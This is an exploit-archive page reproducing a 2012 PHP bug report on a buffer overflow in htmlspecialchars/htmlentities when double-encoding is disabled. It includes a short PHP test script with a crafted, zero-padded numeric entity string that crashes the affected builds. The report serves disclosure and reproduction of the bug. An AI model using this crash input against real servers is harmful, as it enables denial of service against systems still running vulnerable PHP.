[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PHP 5.4SVN-2012-02-03 htmlspecialchars/entities Buffer Overflow
# Published : 2012-02-03
# Author :
# Previous Title : Tracker Software pdfSaver ActiveX 3.60 (pdfxctrl.dll) Stack Buffer Overflow (SEH)
# Next Title : Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT ActiveX Control PlayerPT.ocx spri


From:             cataphract
Operating system: Any
PHP version:      5.4SVN-2012-02-03 (SVN)
Package:          Reproducible crash
Bug Type:         Bug
Bug description:Buffer overflow on htmlspecialchars/entities with $double=false

Description:
------------
Long entities can cause a buffer overflow because the loop only guarantees
40 bytes available in beginning.

Test script:
---------------
<?php
echo
htmlspecialchars('"""""""""""""""""""""""""""""""""""""""""""""&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005;',
ENT_QUOTES, 'UTF-8', false), "n";